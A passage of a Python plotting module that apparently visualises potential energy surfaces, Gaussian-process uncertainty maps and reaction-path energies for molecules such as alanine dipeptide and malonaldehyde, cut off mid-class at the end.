'lvlsGMu': {'default': \"None\", 'assert': islst},\n 'inlnGMu': {'default': \"True\", 'assert': isBool},\n 'ftszGMu': {'default': \"None\", 'assert': isint},\n 'fmtGMu': {'default': \"'%.2f'\", 'assert': isstr},\n 'ftszGMuClrbr': {'default': \"None\", 'assert': isflt},\n\n 'ttlGCov': {'default': \"'Uncertainty Map'\", 'assert': isstr},\n 'fgszGCov': {'default': \"(7.5, 6)\", 'assert': istpl},\n 'xlblGCov': {'default': \"r'$x$'\", 'assert': isstr},\n 'ylblGCov': {'default': \"r'$y$'\", 'assert': isstr},\n 'xlimGCov': {'default': \"None\", 'assert': isarr},\n 'ylimGCov': {'default': \"None\", 'assert': isarr},\n 'ftszGCovXlbl': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ftszGCovYlbl': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ftszGCovMx': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'cmpGCov': {'default': \"None\", 'assert': isstr},\n 'lvlsGCov': {'default': \"None\", 'assert': islst},\n 'ftszGCovClrbr': {'default': \"None\", 'assert': isflt},\n\n 'ttlE': {'default': \"'Energy'\", 'assert': isstr},\n 'fgszE': {'default': \"(6, 3)\", 'assert': istpl},\n 'ftszE': {'default': \"None\", 'assert': isflt},\n 'xlblE': {'default': \"'Path distance'\", 'assert': isstr},\n 'ylblV': {'default': \"r'Potential Energy'\", 'assert': 
isstr},\n 'ylblT': {'default': \"r'Kinetic Energy'\", 'assert': isstr},\n 'ftszEXlbl': {'default': \"13\", 'assert': isint},\n 'ftszVYlbl': {'default': \"13\", 'assert': isint},\n 'ftszTYlbl': {'default': \"13\", 'assert': isint},\n 'mrkrV': {'default': \"'-'\", 'assert': isstr},\n 'mrkrH': {'default': \"'--'\", 'assert': isstr},\n 'mrkrT': {'default': \"'r:'\", 'assert': isstr},\n 'ylimHE': {'default': \"None\", 'assert': istpl},\n 'ylimTE': {'default': \"None\", 'assert': istpl},\n 'alpGV': {'default': \"0.2\", 'assert': isflt},\n 'alpGH': {'default': \"0.2\", 'assert': isflt},\n 'fgszLgnd': {'default': \"None\", 'assert': istpl},\n 'ftszLgnd': {'default': \"None\", 'assert': isflt},\n\n 'ttl3d': {'default': \"'Potential Energy Surface'\", 'assert': isstr},\n 'fgsz3d': {'default': \"None\", 'assert': 'True'},\n 'xlbl3d': {'default': \"r'$x$'\", 'assert': isstr},\n 'ylbl3d': {'default': \"r'$y$'\", 'assert': isstr},\n 'zlbl3d': {'default': \"r'$z$'\", 'assert': isstr},\n 'xlbl3dftsz': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ylbl3dftsz': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'zlbl3dftsz': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n\n 'xlim3d': {'default': \"None\", 'assert': \"True\"},\n 'ylim3d': {'default': \"None\", 'assert': 'True'},\n 'zlim3d': {'default': \"None\", 'assert': 'True'},\n }\n\n def __init__(self, filename=None, prj=None, prjf=None,\n **kwargs):\n self.filename = filename\n self.prj = prj\n self.prjf = prjf\n for key in self.plotter_parameters.keys():\n if key in kwargs:\n setattr(self, key, kwargs[key])\n elif self.__dict__.get(key) is not None:\n continue\n else:\n setattr(self, key, None)\n\n def __setattr__(self, key, value):\n if key == 'prj':\n if value is None:\n def value(x):\n return x\n super().__setattr__(key, value)\n elif key == 'prjf':\n if value is None:\n def value(f, x):\n return f\n super().__setattr__(key, value)\n elif key in self.plotter_parameters:\n default = self.plotter_parameters[key]['default']\n assertion = self.plotter_parameters[key]['assert']\n if value is None:\n value = eval(default.format(name='value'))\n assert eval(assertion.format(name='value')), (key, value)\n super().__setattr__(key, value)\n elif key[0] == '_':\n super().__setattr__(key, value)\n else:\n raise AttributeError('%s not implemented for %s' % (key, value))\n\n def plot(self, paths, savefig=None, filename=None, gaussian=False,\n energy_paths=True):\n if filename is None:\n filename = self.filename\n if savefig is None:\n savefig = self.savefig\n dir = os.path.dirname(filename)\n if dir == '':\n dir = '.'\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n p = self.prj(paths.coords).coords\n\n dim, A = self.get_shape(self.prj(paths.coords))\n if dim == 1:\n raise NotImplementedError('No 1D plot')\n elif dim == 2:\n p0max, p0min = p[0].max(), p[0].min()\n p1max, p1min = p[1].max(), p[1].min()\n p0pad = 0.1 * (p0max - p0min)\n p1pad = 0.1 * (p1max - p1min)\n if self.xlim2d is None:\n self.xlim2d = np.array([p0min - p0pad, p0max + p0pad])\n if self.ylim2d is None:\n self.ylim2d = np.array([p1min - p1pad, p1max + p1pad])\n self.plot_2D(paths, savefig, filename)\n elif dim == 3:\n if self.xlim3d is None:\n self.xlim3d = np.array([p[0].min() - 0.1, p[0].max() + 0.1])\n if self.ylim3d is None:\n self.ylim3d = np.array([p[1].min() - 0.1, p[1].max() + 0.1])\n if self.zlim3d is None:\n self.zlim3d = np.array([p[2].min() - 0.1, p[2].max() + 0.1])\n\n self.plot_3D(paths, savefig, filename)\n else:\n raise NotImplementedError(\"Can't plot \")\n if 
gaussian and dim == 2:\n self.plot_gaussian(paths, savefig, filename, gaussian)\n if energy_paths:\n self.plot_energy_paths(paths, savefig, filename, gaussian)\n\n def plot_3D(self, paths, savefig, filename):\n Axes3D # silence!\n fig = plt.figure(figsize=self.fgsz3d)\n ax = fig.add_subplot(111, projection='3d')\n self._fig, self._ax = fig, ax\n ax.set_title(self.ttl3d)\n ax.set_xlabel(self.xlbl3d, fontsize=self.xlbl3dftsz)\n ax.set_ylabel(self.ylbl3d, fontsize=self.ylbl3dftsz)\n ax.set_zlabel(self.zlbl3d, fontsize=self.zlbl3dftsz)\n\n ax.set_xlim(self.display_lim(self.xlim3d))\n ax.set_ylim(self.display_lim(self.ylim3d))\n ax.set_zlim(self.display_lim(self.zlim3d))\n\n self.plot_trajectory(paths, plt, ax)\n\n if savefig:\n # plt.tight_layout()\n paths.save(real_model=True, filename=filename)\n coords = paths.coords.coords[:]\n with open(filename + '_3D.npz', 'wb') as fd:\n np.savez(fd, coords=coords)\n with open(filename + '_fig3D.pkl', 'wb') as fd:\n pickle.dump(fig, fd)\n plt.savefig(filename + '_3D.' + self.save_format,\n format=self.save_format)\n\n def plot_2D(self, paths, savefig, filename):\n fig, ax = plt.subplots(figsize=self.fgsz2d)\n ax.tick_params(axis='both', which='major', labelsize=self.tick_size)\n # ax.set_title(self.ttl2d)\n # ax.set_xlabel(self.xlbl2d, fontsize=self.xlbl2dftsz)\n # ax.set_ylabel(self.ylbl2d, fontsize=self.ylbl2dftsz)\n\n plt.xlim(self.display_lim(self.xlim2d))\n plt.ylim(self.display_lim(self.ylim2d))\n\n X, Y = self.get_meshgrid(grid_type='contour')\n\n if self.calculate_map:\n Z = self.calculate_model_map(paths, model_type='real')\n Z.reshape((self.rngX2d, self.rngY2d))\n with open(self.mapfile, 'wb') as f:\n pickle.dump(Z, f)\n elif os.path.exists(self.mapfile):\n with open(self.mapfile, 'rb') as f:\n Z = pickle.load(f)\n if Z.shape != X.shape:\n range_x, range_y = Z.shape\n X, Y = self.get_meshgrid(grid_type='contour',\n range_x=range_x, range_y=range_y)\n else:\n Z = np.zeros((self.rngX2d, self.rngY2d))\n ctrkwargs = {}\n if self.lvls2d is not None:\n ctrkwargs['levels'] = self.lvls2d\n CS = ax.contourf(X, Y, self.display_map(Z, map_type='contour'),\n cmap=self.cmp2d, corner_mask=True,\n **ctrkwargs)\n\n fig.colorbar(CS)\n\n self.plot_trajectory(paths, plt, ax)\n # self.plot_information(paths, plt, ax, information='finder')\n\n if savefig:\n plt.tight_layout()\n np.savez(filename+\"_2Dmap.npz\", X=X, Y=Y, Z=Z,\n coords=paths.coords.coords, epoch=paths.coords.epoch,\n unit=paths.coords.unit,\n coordstype=paths.coords.__class__.__name__)\n # with open(filename + '_fig2D.pkl', 'wb') as f:\n # pickle.dump(fig, f)\n plt.savefig(filename + '_2D.' 
+ self.save_format,\n format=self.save_format)\n\n def plot_gaussian(self, paths, savefig, filename, gaussian):\n if not gaussian:\n return\n fig, ax = plt.subplots(figsize=self.fgszGMu)\n ax.tick_params(axis='both', which='major', labelsize=self.tick_size)\n\n # ax.set_title(self.ttlGMu)\n\n # ax.set_xlabel(self.xlblGMu, fontsize=self.ftszGMuXlbl)\n # ax.set_ylabel(self.ylblGMu, fontsize=self.ftszGMuYlbl)\n\n d_xlim = self.display_lim(self.xlim2d)\n d_ylim = self.display_lim(self.ylim2d)\n ax.set_xlim(d_xlim)\n ax.set_ylim(d_ylim)\n\n ave_map = self.calculate_model_map(paths, model_type='ave_map')\n cov_map = self.calculate_model_map(paths, model_type='cov_map')\n self._ave_map = ave_map\n self._cov_map = cov_map\n\n X, Y = self.get_meshgrid(grid_type='contour')\n # cax = fig.add_axes()\n\n CS = ax.contourf(X, Y, self.display_map(ave_map, map_type='contour'),\n cmap=self.cmpGMu, levels=self.lvlsGMu)\n # ax.clabel(CS, inline=self.inlnGMu, fontsize=self.ftszGMu,\n # fmt=self.fmtGMu)\n # im = ax.pcolormesh(X, Y, self.display_map(ave_map), cmap=self.cma2,\n # vmin=-150, vmax=100)\n # fig.colorbar(im, cax=cax)\n # cbar = fig.colorbar(CS)\n # ticklabs = cbar.ax.get_yticklabels()\n # cbar.ax.set_yticklabels(ticklabs, fontsize=self.ftszGMuClrbr)\n # cbar.ax.tick_params(labelsize=self.ftszGMuClrbr)\n\n # forces = paths.model.get_forces(paths, index=np.s_[:])\n self.plot_trajectory(paths, plt, ax,\n xlim=self.xlimGMu, ylim=self.ylimGMu)\n # self.plot_data(paths, plt, ax)\n # self.plot_information(paths, plt, ax, information='finder')\n # self.plot_info_map(paths, plt, ax, information='maximum_energy')\n\n if savefig:\n # plt.tight_layout()\n # with open(filename + '_figmu.pkl', 'wb') as f:\n # pickle.dump(fig, f)\n with open(filename + '_mu.pkl', 'wb') as f:\n pickle.dump(self.display_map(ave_map, map_type='contour'), f)\n with open(filename + '_coords.pkl', 'wb') as f:\n pickle.dump(paths.coords, f)\n plt.savefig(filename + '_mu.' + self.save_format,\n format=self.save_format)\n\n fig, ax = plt.subplots(figsize=self.fgszGCov)\n ax.tick_params(axis='both', which='major', labelsize=self.tick_size)\n\n # ax.set_title(self.ttlGCov)\n ax.set_xlim(d_xlim)\n ax.set_ylim(d_ylim)\n # ax.set_xlabel(self.xlblGCov, fontsize=self.ftszGCovXlbl)\n # ax.set_ylabel(self.ylblGCov, fontsize=self.ftszGCovYlbl)\n\n im = ax.contourf(X, Y, self.display_map(cov_map, map_type='contour'),\n cmap=self.cmpGCov, levels=self.lvlsGCov)\n # im = ax.pcolormesh(X, Y, self.display_map(cov_map), vmax=2, vmin=0,\n # cmap=self.cma3)\n # fig.colorbar(im, cax=cax)\n cbar2 = fig.colorbar(im)\n ticklabs2 = cbar2.ax.get_yticklabels()\n # cbar2.ax.set_yticklabels(ticklabs2, fontsize=self.ftszGCovClrbr)\n # cbar2.ax.tick_params(labelsize=self.ftszGCovClrbr)\n self.plot_trajectory(paths, plt, ax,\n xlim=self.xlimGCov, ylim=self.ylimGCov)\n self.plot_data(paths, plt, ax, mark_update=True)\n # self.plot_information(paths, plt, ax, information='gaussian')\n # self.plot_info_map(paths, plt, ax, information='maximum_uncertainty')\n if savefig:\n np.savez(filename+\"_GPmap.npz\", X=X, Y=Y, ave=ave_map, cov=cov_map,\n coords=paths.coords.coords, epoch=paths.coords.epoch,\n unit=paths.coords.unit,\n coordstype=paths.coords.__class__.__name__,\n **paths.model.kernel.hyperparameters)\n # plt.tight_layout()\n # with open(filename + '_figcov.pkl', 'wb') as f:\n # pickle.dump(fig, f)\n with open(filename + '_cov.pkl', 'wb') as f:\n pickle.dump(self.display_map(cov_map, map_type='contour'), f)\n plt.savefig(filename + '_cov.' 
+ self.save_format,\n format=self.save_format)\n\n def plot_energy_paths(self, paths, savefig, filename, gaussian):\n # Vunit, Kunit = '', ''\n Vunit = ''\n if paths.model.real_model.unit != 'unitless':\n Vunit = '$(%s)$' % paths.model.unit\n # Kunit = '$(%s)$' % (paths.coords.unit or 'unitless')\n\n fig, ax = plt.subplots(figsize=self.fgszE)\n ax.tick_params(axis='both', which='major', labelsize=self.tick_size)\n if self.ylimHE is not None:\n ax.set_ylim(self.ylimHE)\n # ttlE = ''\n # formatkwargs = {'x': 'dist', 'pf': 'paths.finder'}\n\n ax.set_ylabel('Total & Potential', fontsize=self.ftszVYlbl)\n\n dist = paths.get_distances(index=np.s_[1:-1])\n V = paths.get_potential(index=np.s_[1:-1])\n T = paths.get_kinetic_energies(index=np.s_[1:-1])\n lns = ax.plot(dist, V, self.mrkrV, label='$V$')\n if gaussian:\n cov_coords = paths.get_covariance(index=np.s_[1:-1])\n color = lighten_color(lns[0].get_color())\n ax.fill_between(dist, V + cov_coords, V - cov_coords,\n color=color, label=r'$\\Sigma$')\n cov_max_idx = cov_coords.argmax()\n annot_x = dist[cov_max_idx]\n annot_y = V[cov_max_idx] + cov_coords.max()\n\n H = V + T\n # ax.plot(dist, H, '--')\n ax2 = ax.twinx()\n if self.ylimTE is not None:\n ax2.set_ylim(self.ylimTE)\n ax2.tick_params(axis='both', which='major', labelsize=self.tick_size)\n # ax2.set_ylabel(self.ylblT + Kunit, fontsize=self.ftszTYlbl)\n ax2.set_ylabel(self.ylblT, fontsize=self.ftszTYlbl)\n if self.plot_along_distance:\n lns += ax.plot(dist, H, self.mrkrH, label='$H$')\n lns += ax2.plot(dist, T, self.mrkrT, label='$T$')\n else:\n lns += ax.plot(H, self.mrkrH, label='$H$')\n lns += ax2.plot(T, self.mrkrT, label='$T$')\n\n x0 = dist[V.argmax()]\n y0 = V.min()\n x1 = x0\n y1 = V.max()\n dE = (V.max() - y0)\n dE = r'$%s$' % self.display_float(dE, unit=Vunit)\n if savefig:\n plt.tight_layout()\n if gaussian:\n np.savez(filename + '_Egraph.npz', V=V, H=H, T=T,\n cov=cov_coords)\n with open(filename + '_VHTVarEt.pkl', 'wb') as f:\n pickle.dump(V, f)\n pickle.dump(H, f)\n pickle.dump(T, f)\n pickle.dump(cov_coords, f)\n # pickle.dump(paths.finder.real_finder.Et, f)\n else:\n np.savez(filename + '_Egraph.npz', V=V, H=H, T=T)\n with open(filename + '_figE.pkl', 'wb') as f:\n pickle.dump(fig, f)\n plt.savefig(filename + '_E.' + self.save_format,\n format=self.save_format)\n\n # handles, labels = ax2.get_legend_handles_labels()\n # ax2.get_legend_handles_labels()\n labs = [l.get_label() for l in lns]\n plt.legend(lns, labs, loc='upper left', fontsize=self.ftszLgnd)\n\n if savefig:\n plt.tight_layout()\n with open(filename + '_figLgnd.pkl', 'wb') as f:\n pickle.dump(fig, f)\n plt.savefig(filename + '_Lgnd.' 
+ self.save_format,\n format=self.save_format)\n plt.close('all')\n\n def plot_trajectory(self, paths, plt, ax, xlim=None, ylim=None, zlim=None,\n forces=None):\n plotter_coords = self.prj(paths.coords).coords\n dim, A = self.get_shape(plotter_coords)\n if dim == 2:\n D = dim * A\n coords = plotter_coords.reshape(D, 1, -1)\n line_color = [self.line_color]\n scatter_color = [lighten_color(self.line_color, amount=0.5)]\n # scatter_color = ['orange']\n else:\n coords = plotter_coords\n line_color = jmol_colors[paths.model.real_model.image.symbols.numbers]\n # line_color = jmol_colors[[13]*12 + [79]]\n # line_color = jmol_colors[[13]*12 + [79]]\n scatter_color = [lighten_color(c) for c in line_color]\n for i in range(A):\n coord = coords[..., i, :]\n d_coord = self.display_coord(coord, xlim=xlim, ylim=ylim, zlim=zlim)\n d_traj = self.periodic_masked_array(d_coord, xlim, ylim, zlim)\n # ax.plot(*d_path, color=color[i])\n # ax.scatter(*d_path, color='orange')\n ax.plot(*d_traj, color=line_color[i])\n ax.scatter(*d_coord, color=scatter_color[i], alpha=0.5)\n if forces is not None:\n force = forces[:, i, :]\n # *(forces.reshape(-1, paths.coords.N))\n ax.quiver(*d_coord, *force, color='w')\n\n def plot_data(self, paths, plt, ax, mark_update=False, quiver_scale=None):\n if quiver_scale is None and self.quiver_scale is None:\n quiver_scale = 1 / self.conformation\n elif quiver_scale is None:\n quiver_scale = self.quiver_scale\n\n D, N = paths.coords.shape\n data = paths.get_image_data()\n X_dat = self.display_coord(data['coords'].reshape(D, -1))\n F_dat = -data['gradients'].reshape(D, -1)\n tX, tY = X_dat[0, :], X_dat[1, :]\n ax.scatter(tX, tY, color='black', marker='x', s=paths.coords.N)\n ax.quiver(tX, tY, *F_dat, color='w', angles='xy', scale_units='xy',\n scale=quiver_scale)\n if mark_update:\n ax.scatter(tX[-1], tY[-1], color='red', marker='X',\n s=paths.coords.N)\n\n def plot_information(self, paths, plt, ax, information='finder', xlim=None,\n ylim=None):\n if xlim is None:\n xlim = self.display_lim(self.xlim2d)\n if ylim is None:\n ylim = self.display_lim(self.ylim2d)\n if information == 'finder':\n param = r''\n for key, value in paths.finder.display_map_parameters.items():\n number = eval(value['value'].format(pf='paths.finder'))\n unit = eval(value.get('unit', '\"\"').format(p='paths'))\n if unit == 'unitless' or unit is None:\n unit = ''\n force_LaTex = value.get('force_LaTex', False)\n significant_digit = value.get('significant_digit')\n df_kwargs = {'unit': unit, 'force_latex': force_LaTex,\n 'significant_digit': significant_digit}\n number = self.display_float(number, **df_kwargs)\n param += value['label'] + r'$: {n:s}$'.format(n=number)\n param += '\\n'\n elif information == 'gaussian':\n param = r''\n # display_digit = min(np.log10(np.abs(values)))\n # for key, value in paths.model.hyperparameters.items():\n # if key == 'sigma_f':\n # continue\n # number = self.display_float(value, force_latex=True,\n # significant_digit=2)\n # param += r'$\\{key:s}: {n:s}$'.format(key=key, n=number)\n # param += '\\n'\n if param != r'':\n param = param[:-1]\n\n ec = (0.5, 0.5, 0.5)\n fc = (1., 1., 1.)\n ax2 = plt.text(0.5, 2.1, param, size=self.ftsz2dInfo,\n ha=\"left\", va=\"top\",\n bbox=dict(boxstyle=\"round\", ec=ec, fc=fc, alpha=0.5))\n plt.gcf().canvas.draw()\n box = ax2.get_window_extent().transformed(plt.gca().transData.inverted())\n x1 = xlim[-1] - (xlim[-1] - xlim[0]) / 40\n y0 = ylim[-1] - (ylim[-1] - ylim[0]) / 20\n x0 = x1 - box.width\n ax2.set_position([x0, y0, box.width, 
box.height])\n\n def plot_info_map(self, paths, plt, ax, information='maximum_energy'):\n if information == 'maximum_energy':\n E = paths.get_potential(index=np.s_[1:-1])\n unit = paths.model.unit\n string = r'$\\mu^{(max)} : %s$' % self.display_float(E.max(),\n unit=unit)\n\n xy = paths.coords.coords[..., 1 + E.argmax()].flatten()\n fontsize = self.ftszGMuMx\n elif information == 'maximum_uncertainty':\n cov = paths.get_covariance()\n # cov[cov < 0] = 0\n string = r'$\\Sigma^{(max)} : %s$' % self.display_float(\n cov.max(), force_latex=True,\n significant_digit=2)\n xy = paths.coords.coords[..., cov.argmax()].flatten()\n fontsize = self.ftszGCovMx\n xy *= self.conformation\n offset = 64\n ec = (0.5, 0.5, 0.5)\n fc = (1., 1., 1.)\n\n ax.annotate(text=string, xy=xy, xytext=(-1.5 * offset, -offset),\n textcoords='offset points', fontsize=fontsize,\n bbox=dict(boxstyle=\"round\", ec=ec, fc=fc, alpha=0.5),\n arrowprops=dict(connectionstyle=\"arc3,rad=.3\",\n arrowstyle='->'))\n\n def plot_legend(self, paths, plt, ax):\n ax3 = plt.subplot(111)\n box = ax.get_position()\n ax3.set_position([box.x0, box.y0, box.width * 0.65, box.height])\n legend_x = 1\n legend_y = 0.5\n plt.legend([self.mrkrV, self.mrkrH, self.mrkrT], loc='center left',\n bbox_to_anchor=(legend_x, legend_y), fontsize=self.lgd_ftsz)\n\n def periodic_masked_array(self, coord, xlim=None, ylim=None, zlim=None):\n \"\"\"\n coord is D x P array\n \"\"\"\n D, P = coord.shape\n conformation = self.conformation\n diff = self.display_size(xlim, ylim, zlim, dimension=D)\n diff *= 0.5 * conformation\n coord_diff = np.diff(coord) # D x P - 1\n mask_coord = np.hstack([np.abs(coord_diff) > diff, np.zeros((D, 1))])\n mask = np.any(mask_coord, axis=0)\n idx = np.argwhere(mask).flatten()\n mask_pad = np.zeros((D, len(idx) * 3), dtype=bool)\n mask_pad[:, 1::3] = True\n periodic_mask = np.insert(np.zeros((D, P), dtype=bool),\n np.repeat(idx + 1, 3), mask_pad, axis=1)\n coord_ = coord[:, idx + 1] # D x P'\n _coord = coord[:, idx] # D x P'\n m_coord = mask_coord[:, idx]\n coord_sign = np.sign(coord_diff[:, idx])\n coord_pad = np.zeros((D, len(idx) * 3))\n\n patch = m_coord * coord_sign * diff * 2 * conformation\n coord_pad[:, ::3] = coord_ - patch\n coord_pad[:, 2::3] = _coord + patch\n periodic_coord = np.insert(coord, np.repeat(idx + 1, 3), coord_pad,\n axis=1)\n return np.ma.MaskedArray(periodic_coord, periodic_mask)\n\n def display_window(self, xlim=None, ylim=None, zlim=None, dimension=3):\n if xlim is None:\n if dimension == 2:\n xlim = self.xlim2d\n elif dimension == 3:\n xlim = self.xlim3d\n if ylim is None:\n if dimension == 2:\n ylim = self.ylim2d\n elif dimension == 3:\n ylim = self.ylim3d\n if dimension == 3 and zlim is None:\n zlim = self.zlim3d\n return {0: xlim, 1: ylim, 2: zlim}\n\n def display_origin(self, xlim=None, ylim=None, zlim=None,\n translation=None, dimension=3):\n if translation is None:\n translation = self.translation\n origin = np.zeros(dimension)\n win = self.display_window(xlim=xlim, ylim=ylim, zlim=zlim,\n dimension=dimension)\n if np.isscalar(translation):\n translation = np.array([translation] * dimension)\n for i in range(dimension):\n origin[i] = win[i][0] + translation[i]\n return origin\n\n def display_size(self, xlim=None, ylim=None, zlim=None, dimension=3):\n win = self.display_window(xlim, ylim, zlim, dimension)\n window_size = np.zeros((dimension, 1))\n for i in range(dimension):\n window_size[i] = (win[i][1] - win[i][0])\n return window_size\n\n def display_map(self, Z, map_type='pcolormesh'):\n \"\"\"\n X : 
2 x P\n Y : 2 x P\n Z : 2 x P\n \"\"\"\n if map_type == 'pcolormesh':\n return Z\n elif map_type == 'contour':\n return Z\n # _Z = np.vstack([Z, Z[0]])\n # _Z = np.hstack([_Z, _Z[:, -1, np.newaxis]])\n # return _Z\n else:\n NotImplementedError('only `contour` `pcolormesh` support')\n\n def display_lim(self, lim, translation=None, conformation=None):\n if lim is None:\n return None\n elif type(lim) == list:\n lim = np.array(lim)\n if translation is None:\n translation = self.translation\n if conformation is None:\n conformation = self.conformation\n return conformation * (lim + translation)\n\n def display_coord(self, coord, xlim=None, ylim=None, zlim=None,\n conformation=None, pbc=None):\n \"\"\"\n coord : D x P\n \"\"\"\n if conformation is None:\n conformation = self.conformation\n if pbc is None:\n pbc = self.pbc\n p = np.zeros(coord.shape)\n D = p.shape[0]\n origin = self.display_origin(xlim, ylim, zlim, dimension=D)\n win_size = self.display_size(xlim, ylim, zlim, dimension=D)\n for d in range(D):\n if pbc[d]:\n p[d] = (coord[d] - origin[d]) % (win_size[d]) + origin[d]\n else:\n p[d] = coord[d]\n return conformation * p\n\n def get_shape(self, coords):\n if len(coords.shape) == 2:\n return coords.shape[0], 1\n elif len(coords.shape) == 3:\n return coords.shape[:2]\n else:\n shape = ','.join([str(d) for d in coords.shape])\n raise NotImplementedError('invalid shape (' + shape + ')')\n\n def get_meshgrid(self, grid_type='coords', xlim=None, ylim=None,\n range_x=None, range_y=None):\n if xlim is None:\n xlim = self.xlim2d\n if ylim is None:\n ylim = self.ylim2d\n if range_x is None:\n range_x = self.rngX2d\n if range_y is None:\n range_y = self.rngY2d\n xlim = np.array(xlim) + self.translation\n ylim = np.array(ylim) + self.translation\n if grid_type == 'coords':\n x = np.linspace(*xlim, range_x)\n y = np.linspace(*ylim, range_y)\n X, Y = np.meshgrid(x, y)\n # return np.c_[X.ravel(), Y.ravel()].T[:, np.newaxis, :]\n return np.c_[X.ravel(), Y.ravel()].T\n elif grid_type in ['contour']:\n x = np.linspace(*xlim, range_x)\n y = np.linspace(*ylim, range_y)\n return self.conformation * np.array(np.meshgrid(x, y))\n elif grid_type in ['pcolormesh']:\n x = np.linspace(*xlim, range_x + 1)\n y = np.linspace(*ylim, range_y + 1)\n return self.conformation * np.array(np.meshgrid(x, y))\n else:\n NotImplementedError('Only `contour`, `pcolormesh` supports')\n\n def calculate_model_map(self, paths, model_type='real', xlim=None,\n ylim=None, range_x=None, range_y=None,\n grid_type='coords'):\n if range_x is None:\n range_x = self.rngX2d\n if range_y is None:\n range_y = self.rngY2d\n _coords = self.get_meshgrid(xlim=xlim, ylim=ylim, grid_type=grid_type)\n coords = self.prj(paths.coords(coords=_coords))\n shape = (range_x, range_y)\n if model_type == 'real':\n E = paths.get_potential(coords=coords, real_model=True)\n return E.reshape(shape)\n elif model_type == 'ave_map':\n ave_map = paths.get_potential(coords=coords)\n return ave_map.reshape(shape)\n elif model_type == 'cov_map':\n cov_map = paths.get_covariance(coords=coords)\n return cov_map.reshape(shape)\n\n def display_float(self, f, display_range=None, display_digit=None,\n leading_digit=None, last_digit=None,\n significant_digit=None, unit='', force_latex=False):\n \"\"\"\n get float\n return string\n \"\"\"\n if display_range is None:\n display_range = self.energy_range\n if display_digit is None:\n display_digit = self.energy_digit\n if leading_digit is None:\n leading_digit = int(np.max(np.log10(np.abs(display_range))))\n lower, upper = 
display_range\n        if last_digit is None:\n            last_digit = np.min([display_digit, np.log10(upper - lower)])\n            last_digit = int(last_digit)\n        if significant_digit is None:\n            significant_digit = leading_digit - last_digit\n\n        if significant_digit > 6:\n            # Overlap should be handled\n            _f = np.sign(f) * (np.abs(f) % (10 ** (last_digit + 6)))\n            if leading_digit > 6 or last_digit < -6 or force_latex:\n                df = '{f:.6E}'.format(f=_f)\n            elif last_digit >= 0:\n                df = '{f:.0f}'.format(f=_f)\n            else:\n                df = '{f:.{decimal:d}f}'.format(decimal=-last_digit, f=_f)\n        elif significant_digit > 2:\n            if leading_digit > 6 or last_digit < -6 or force_latex:\n                df = '{f:.{sd:d}E}'.format(sd=significant_digit, f=f)\n            elif last_digit >= 0:\n                df = '{f:.0f}'.format(f=f)\n            else:\n                df = '{f:.{decimal:d}f}'.format(decimal=-last_digit, f=f)\n        else:\n            if leading_digit > 4 or last_digit < -4 or force_latex:\n                df = '{f:.2E}'.format(f=f)\n            else:\n                df = '{f:.2f}'.format(f=f)\n        if \"E\" in df:\n            base, exponent = df.split(\"E\")\n            df = r\"{0} \\times 10^{{{1}}}\".format(base, int(exponent))\n        return df + unit\n\n\nclass FlatModelPlotter(Plotter):\n    def __init__(self, **kwargs):\n        self.calculate_map = True\n        self.ttl2d = 'Flat Model Energy Surface'\n        ref = -129.5\n        self.xlim2d = np.array([-1.2, 1.2])\n        self.ylim2d = np.array([-1.2, 1.2])\n        self.cmp2d = 'cividis'\n        self.alp2d = 0.5\n        self.xlimGMu = np.array([-1.2, 1.2])\n        self.ylimGMu = np.array([-1.2, 1.2])\n        self.cmpGMu = 'cividis'\n        self.lvls2d = np.linspace(-0.2, 0.2, 15) + ref\n        self.lvlsGMu = np.linspace(-0.2, 0.2, 15) + ref\n        self.cmpGCov = 'plasma'\n        self.lvlsGCov = np.linspace(0, 2, 15)\n        self.pbc = np.array([False, False])\n        self.energy_range = tuple(np.array([-0.5, 0.5]) + ref)\n        self.quiver_scale = 3\n        self.ylimHE = tuple(np.array([-0.5, 0.5]) + ref)\n        self.ylimTE = (0, 1)\n\n        super().__init__(**kwargs)\n\n\nclass AlanineDipeptidePlotter(Plotter):\n    def __init__(self, **kwargs):\n        self.calculate_map = False\n        self.conformation = 180 / np.pi\n        self.translation = 0.\n        self.pbc = np.array([True, True])\n        self.energy_digit = -2\n\n        self.ttl2d = 'Alanine Dipeptide Potential Energy Surface'\n        self.xlim2d = np.array([-np.pi, np.pi])\n        self.ylim2d = np.array([-np.pi, np.pi])\n        self.cmp2d = 'cividis'\n        self.alp2d = 0.5\n        self.xlimGMu = np.array([-np.pi, np.pi])\n        self.ylimGMu = np.array([-np.pi, np.pi])\n        self.cmpGMu = 'cividis'\n        self.lvls2d = np.linspace(-130, -129, 20)\n        self.lvlsGMu = np.linspace(-130, -129, 20)\n        self.cmpGCov = 'plasma'\n        self.lvlsGCov = np.linspace(0, 2, 15)\n        self.energy_range = (-130, -129)\n        self.ylimHE = (-130, -129)\n        self.ylimTE = (0, 1)\n        self.quiver_scale = 100\n\n        super().__init__(**kwargs)\n\n\nclass MalonaldehydePlotter(Plotter):\n    def __init__(self, **kwargs):\n        self.calculate_map = False\n        self.conformation = 1\n        self.translation = 0.\n        self.pbc = np.array([False, False])\n        self.energy_digit = -2\n\n        self.ttl2d = 'Malonaldehyde Potential Energy Surface'\n        self.xlim2d = np.array([-0.6, 0.6])\n        self.ylim2d = np.array([1.1, 1.4])\n        self.cmp2d = 'cividis'\n        self.alp2d = 0.5\n        self.xlimGMu = np.array([-0.6, 0.6])\n        self.ylimGMu = np.array([1.1, 1.4])\n        self.cmpGMu = 'cividis'\n        self.lvls2d = np.linspace(-53.7, -52, 20)\n        self.lvlsGMu = np.linspace(-53.7, -52, 20)\n        self.cmpGCov = 'plasma'\n        self.lvlsGCov = np.linspace(0, 2, 15)\n        self.energy_range = (-53.7, -52)\n        self.ylimHE = (-53.7, -52)\n        self.ylimTE = (0, 1)\n        self.quiver_scale = 100\n\n        super().__init__(**kwargs)\n\n\nclass HafniumDioxidePlotter(Plotter):\n    def __init__(self, **kwargs):\n        
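# NOTE: the limits/levels below mirror AlanineDipeptidePlotter and may need\n        # tuning for HfO2; treat them as placeholder defaults reused verbatim.\n        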
